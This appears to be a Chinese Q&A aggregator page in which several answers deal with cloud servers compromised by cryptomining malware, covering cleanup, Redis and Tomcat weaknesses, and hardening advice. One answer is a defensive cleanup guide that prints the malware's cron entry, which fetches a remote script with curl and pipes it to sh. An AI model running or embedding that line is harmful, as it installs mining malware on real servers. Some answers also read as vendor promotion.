當前位置:首頁 » 挖礦知識 » 阿里雲伺服器被黑挖礦

阿里雲伺服器被黑挖礦

發布時間: 2022-08-25 08:11:44

⑴ 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦?去舉報啊。之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。你看你的被下了啥,就去找他們處理。

⑵ 阿里雲伺服器太不安全了,老是被攻擊,工作人員就負責把伺服器給我關了

阿里雲提供基礎設施服務,按需取用伺服器資源,但是安全防禦企業自身也一定要重視起來,不要以為上雲了之後就絕對安全了,阿里雲提供最高5g的免費防禦ddos流量攻擊,如果安全策略做得更高則需要購買高防ip。
你這個情況應該是受到攻擊並沒有更好的安全措施,當攻擊達到一定程度,工作人員會將其關閉,以防遭受到更大的損失。

⑶ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

⑷ 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的,因為沒有解決好漏洞。
建議是重做系統,然後找護衛神給你做一下系統安全加固,把漏洞徹底堵住才有效果。

⑸ 黑客攻擊阿里雲伺服器的目的

黑客攻擊伺服器無外乎為了錢,一但關機對其造成了影響,勢必造成客戶對阿里雲的信任問題,造成客戶流失。
同行的話,目的已經達成,如果純粹的黑客就是為了體現自己的技術,或者為了勒索阿里雲。

⑹ 阿里雲買的伺服器被黑了怎麼辦

阿里雲伺服器遭受大流量攻擊而進入黑洞,所有來自外部的流量都會被丟棄,黑洞期間,伺服器的外網訪問將被屏蔽。最好的解決方法就是清洗流量,先換ip,新換的ip不要泄露出去,然後找第三方進行流量清洗,這個過程要注意硬防和只能防的區別,最好是智能防護,將流量損失降到最低!

⑺ 阿里雲伺服器剛買兩天就被攻擊當肉雞,黑客怎麼做到的

您這伺服器是被黑客入侵了,被黑的因素 一般都是程序留了後門或vps內被留了系統內核級別的木馬 或網站的代碼留了隱蔽性的木馬或一句話shell
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
伺服器被黑是每個網站管理員最頭痛的問題 也可以通過安全公司來解決,國內也就Sinesafe和綠盟等安全公司 比較專業.

⑻ 阿里雲被黑能贖回嗎

不能。阿里雲被黑,所有來自外部的流量都會被丟棄,黑洞期間,伺服器的外網訪問將被屏蔽,期間無法贖回,會進入5天的等待刪除期。

⑼ 阿里雲伺服器總是被攻擊,基本上剛買就會被攻擊,是為什麼

歸屬於阿里雲伺服器的ip是有范圍值的。
阿里屬於比較大型的伺服器提供商,雲主機伺服器租用量較大。
有可能攻擊並不是針對你的,而是之前別的雲主機使用了這個ip,然後退用了雲主機後ip重新歸屬,正好被你用上了。所以就一租用就被攻擊了。
伺服器和網站被攻擊的話,建議檢查下伺服器的系統日誌和網站運行的日誌,分析確定下是受到了什麼類型的攻擊,然後伺服器是哪個調解下相應的安全策略來進行防禦。
也可以安裝安全狗之類的防護軟體來進行防禦。
伺服器安全狗主要保護伺服器免遭惡意攻擊,包括DDOS、ARP防火牆、遠程桌面守護、埠保護、網路監控等。
網站安全狗主要保護伺服器上網站的安全,包括網馬掛馬掃描、SQL注入防護,CC攻擊防護,資源保護等。
兩者防護方向不同。建議結合使用可以讓保護更全面。
在防禦的同時,可以查看防護日誌,了解伺服器和網站受到的是什麼類型的攻擊,然後針對攻擊類型來調節防護規則,可以更為有效地進行防禦。

⑽ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

熱點內容
比特幣是誰發行得 發布:2024-11-16 22:32:56 瀏覽:176
etn挖礦算力 發布:2024-11-16 22:32:35 瀏覽:544
5g升級會員合約包b類怎麼退訂 發布:2024-11-16 22:30:13 瀏覽:141
最具影響力海外區塊鏈錢包 發布:2024-11-16 22:21:07 瀏覽:521
做一款區塊鏈需要多少錢 發布:2024-11-16 22:17:44 瀏覽:910
18年1月比特幣 發布:2024-11-16 22:17:39 瀏覽:812
合約現貨外匯怎麼玩 發布:2024-11-16 22:16:46 瀏覽:327
蘋果4合約機丟失怎麼辦 發布:2024-11-16 22:12:41 瀏覽:628
trx4陀螺儀 發布:2024-11-16 22:04:08 瀏覽:455
bitmax停止挖礦 發布:2024-11-16 21:25:09 瀏覽:356